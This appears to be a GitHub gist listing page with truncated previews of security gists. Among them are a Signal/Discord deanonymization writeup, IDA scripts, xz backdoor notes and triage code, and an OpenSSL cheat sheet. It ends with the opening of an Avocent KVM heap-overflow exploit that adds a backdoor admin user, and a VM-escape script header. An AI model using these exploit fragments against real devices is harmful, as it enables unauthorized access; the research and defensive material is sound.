
@infernalheaven
infernalheaven / research.md
Created January 21, 2025 23:36 — forked from hackermondev/research.md
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platforms

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@infernalheaven
infernalheaven / export_symbols.idc
Created September 5, 2024 15:23 — forked from ChrisDietrich/export_symbols.idc
Export function names from IDA Pro to text file
// based on https://gist.github.com/hax0kartik/e358ce447a4537bcef534aa8de84817c
#include <idc.idc>
static FuncDump(f, start)
{
auto ea, str, teststr;
ea = start;
while( ea != BADADDR )
@infernalheaven
infernalheaven / export_symbol.idc
Created September 5, 2024 15:05 — forked from hax0kartik/export_symbol.idc
Export symbols from IDA to a ghidra importable symbol file
#include <idc.idc>
static FuncDump(f, start)
{
auto ea, str, count, ref;
auto end;
auto teststr;
ea = start;
@infernalheaven
infernalheaven / README.md
Created June 5, 2024 12:18 — forked from Theldus/README.md
The only proper way to debug 16-bit (x86) code on Qemu+GDB

The only proper way to debug 16-bit code on Qemu+GDB

(or nearly so...)

GDB is undeniably an extremely versatile debugger, with the ability to add breakpoints, watchpoints, dump memory, registers, and the source code (along with its corresponding assembly). These features make it the perfect Swiss Army knife for most programmers. In addition to that, the possibility of implementing a 'GDB Stub' and automatically supporting GDB in your application makes it an almost universal debugger for a variety of tasks.

Qemu, like other virtual machines (such as 86Box), also implements debugging via GDB Stub, which enormously facilitates the development of bootloaders, operating systems, and more. The support for 32-bit and 64-bit code is quite good, and I have never seen any complaints about it. However, for 16-bit/real mode...

Is debugging in 16-bit/real mode really that bad?

If you have ever tried to debug 16-bit code on Qemu, you know how painful it can be:

  1. GDB thinks your code is
@infernalheaven
infernalheaven / test_dll.c
Created April 13, 2024 04:48 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@infernalheaven
infernalheaven / hashes.txt
Created April 3, 2024 13:16 — forked from q3k/hashes.txt
liblzma backdoor strings extracted from 5.6.1 (from a built-in trie)
0810 b' from '
0678 b' ssh2'
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
0708 b'%s'
0108 b'/usr/sbin/sshd\x00'
0870 b'Accepted password for '
01a0 b'Accepted publickey for '
0c40 b'BN_bin2bn\x00'
06d0 b'BN_bn2bin\x00'
0958 b'BN_dup\x00'
@infernalheaven
infernalheaven / xz-backdoor.md
Created March 29, 2024 22:02 — forked from thesamesam/xz-backdoor.md
xz-utils backdoor situation

FAQ on the xz-utils backdoor

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for

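The FAQ above is cut off before it reaches the triage advice, so here is an added helper, not part of the original gist, that does the first check a responder wants: parse `xz --version`, flag the two backdoored releases (5.6.0 and 5.6.1), and report whether the host's `sshd` links liblzma, which was the path the backdoor used on distributions whose sshd pulls in libsystemd. The function names and the sample version output embedded in the block are constructed for illustration.

```shell
#!/bin/sh
# Added triage helper for the xz-utils backdoor (not from the original FAQ).

# Constructed sample of `xz --version` output, as printed by an affected host.
SAMPLE_XZ_VERSION_OUTPUT='xz (XZ Utils) 5.6.1
liblzma 5.6.1'

# Extract the version number from `xz --version` output passed in $1.
# On a live host: xz_version_from_output "$(xz --version 2>/dev/null)"
xz_version_from_output() {
    printf '%s\n' "$1" | sed -n 's/^xz (XZ Utils) \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# True (exit 0) when the version is one of the two releases that shipped the backdoor.
xz_version_is_backdoored() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *) return 1 ;;
    esac
}

# Report whether the sshd binary loads liblzma: prints yes, no or unknown.
# Affected builds were those where sshd links libsystemd, which links liblzma.
sshd_links_liblzma() {
    sshd_path=$(command -v sshd 2>/dev/null || echo /usr/sbin/sshd)
    if [ ! -x "$sshd_path" ] || ! command -v ldd >/dev/null 2>&1; then
        echo unknown
        return 0
    fi
    if ldd "$sshd_path" 2>/dev/null | grep -q liblzma; then echo yes; else echo no; fi
}

# Overall verdict for one host, given its `xz --version` output in $1.
# Exit 0 = not an affected version, 1 = affected, 2 = could not determine.
xz_triage() {
    v=$(xz_version_from_output "$1")
    if [ -z "$v" ]; then
        echo "xz not found or version unparsable"
        return 2
    fi
    if xz_version_is_backdoored "$v"; then
        echo "AFFECTED: xz $v (sshd links liblzma: $(sshd_links_liblzma))"
        return 1
    fi
    echo "ok: xz $v"
    return 0
}

# Demonstration on the constructed sample; returns xz_triage's exit status.
xz_triage_demo() {
    xz_triage "$SAMPLE_XZ_VERSION_OUTPUT"
}
```

A version match alone does not prove the malicious object code was built in (it was only injected from the release tarball's m4 files on certain x86-64 builds), but a 5.6.0 or 5.6.1 install is the signal to downgrade first and investigate second.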
@infernalheaven
infernalheaven / OpenSSL cheat sheet for socket programmers.md
Created January 9, 2024 16:29 — forked from azadkuh/OpenSSL cheat sheet for socket programmers.md
OpenSSL cheat sheet. This is a brief howto for socket programmers.

# OpenSSL cheat sheet

This is a brief howto for socket programmers.

create RSA key pairs

e.g. a 1024-bit key pair (kept as the original shows it; 1024-bit RSA is too short for current use, so prefer 2048 bits or more in practice):

$> openssl genrsa -out myprivate.pem 1024
$> openssl rsa -in myprivate.pem -pubout -out mypublic.pem
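As an added example that is not part of the original cheat sheet: the same key-pair generation with a current key size, using `openssl genpkey` (the maintained replacement for `genrsa`) and a check that reads the modulus length back out of the key so a too-short key is rejected before it is deployed. Function names and file paths are illustrative; the block assumes an OpenSSL 1.1 or 3.x binary on PATH.

```shell
#!/bin/sh
# Added example (not from the cheat sheet): generate an RSA key pair at a
# modern size and verify the modulus length before using the key.

# Generate a private key of $2 bits (default 3072) into $1 and write the
# matching public key to $1.pub. Exit status is non-zero if OpenSSL fails.
gen_rsa_keypair() {
    key=$1
    bits=${2:-3072}
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:"$bits" -out "$key" 2>/dev/null || return 1
    openssl pkey -in "$key" -pubout -out "$key.pub" 2>/dev/null
}

# Print the modulus size in bits of the private key in $1.
# OpenSSL prints "Private-Key: (3072 bit, 2 primes)" (3.x / 1.1 prefix it
# with "RSA "), so match only the number inside the parentheses.
rsa_key_bits() {
    openssl pkey -in "$1" -noout -text 2>/dev/null \
        | sed -n 's/.*Private-Key: (\([0-9][0-9]*\) bit.*/\1/p' | head -n 1
}

# True (exit 0) when the key in $1 is at least $2 bits (default floor 2048).
rsa_key_acceptable() {
    bits=$(rsa_key_bits "$1")
    [ -n "$bits" ] && [ "$bits" -ge "${2:-2048}" ]
}

# Side-by-side demonstration: the weak 1024-bit setting from the cheat sheet
# is rejected, the 3072-bit key passes. Prints one line per key.
rsa_keygen_demo() {
    dir=$(mktemp -d)
    gen_rsa_keypair "$dir/weak.pem" 1024
    gen_rsa_keypair "$dir/good.pem" 3072
    for k in weak good; do
        if rsa_key_acceptable "$dir/$k.pem"; then
            echo "$k.pem: $(rsa_key_bits "$dir/$k.pem") bits, acceptable"
        else
            echo "$k.pem: $(rsa_key_bits "$dir/$k.pem") bits, REJECTED"
        fi
    done
    rm -rf "$dir"
}
```

`openssl rsa -pubout` from the cheat sheet and `openssl pkey -pubout` produce the same SubjectPublicKeyInfo PEM; `pkey` is used here only because it works for any key type.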
@infernalheaven
infernalheaven / asmpwn.py
Created December 30, 2023 15:08 — forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # port is hardcoded in the binary
usernm = username.encode()
#!/usr/bin/env python
# https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl
import sys
import time
import getopt
import socket
'''
Gives the hexadecimal representation of "command"